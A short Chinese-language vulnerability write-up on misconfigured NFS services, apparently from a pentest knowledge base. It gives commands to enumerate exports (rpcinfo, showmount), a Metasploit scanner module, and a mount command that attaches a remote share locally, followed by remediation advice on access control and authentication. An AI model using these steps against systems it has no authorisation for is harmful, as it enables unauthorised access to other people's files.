1.nfs简介
NFS(Network File System)即网络文件系统,是FreeBSD支持的文件系统中的一种,它允许网络中的计算机之间通过TCP/IP网络共享资源。在NFS的应用中,本地NFS的客户端应用可以透明地读写位于远端NFS服务器上的文件,就像访问本地文件一样。如今NFS具备了防止被利用导出文件夹的功能,但遗留系统中的NFS服务配置不当,则仍可能遭到恶意攻击者的利用。nsf默认端口为2049。
2.漏洞利用
检索主机是否运行了nfs服务
rpcinfo -p IP
使用showmount命令导出文件夹列表
showmount -e IP showmount IP // 连接的主机 showmount -d IP // 目录 showmount -a IP // 挂载点
metasploit auxiliary/scanner/nfs/nfsmount模块可以利用漏洞,查看目录列表:
(注意:协议和端口根据实际情况变换,可使用rpcinfo 查看主机的nfs服务信息进行判断)
本地挂载目标的nfs共享目录
mount -t nfs 192.168.1.172:/bbsdatavol /temp -o nolock //将1.172的bbsdatavol目录挂载到本机的temp目录
随后可以使用 df -h列出本机的所有磁盘信息
df -h
3.修复建议
1.使用网络访问控制策略,限制能够连接到 NFS 服务器的主机范围;
2.增加访问认证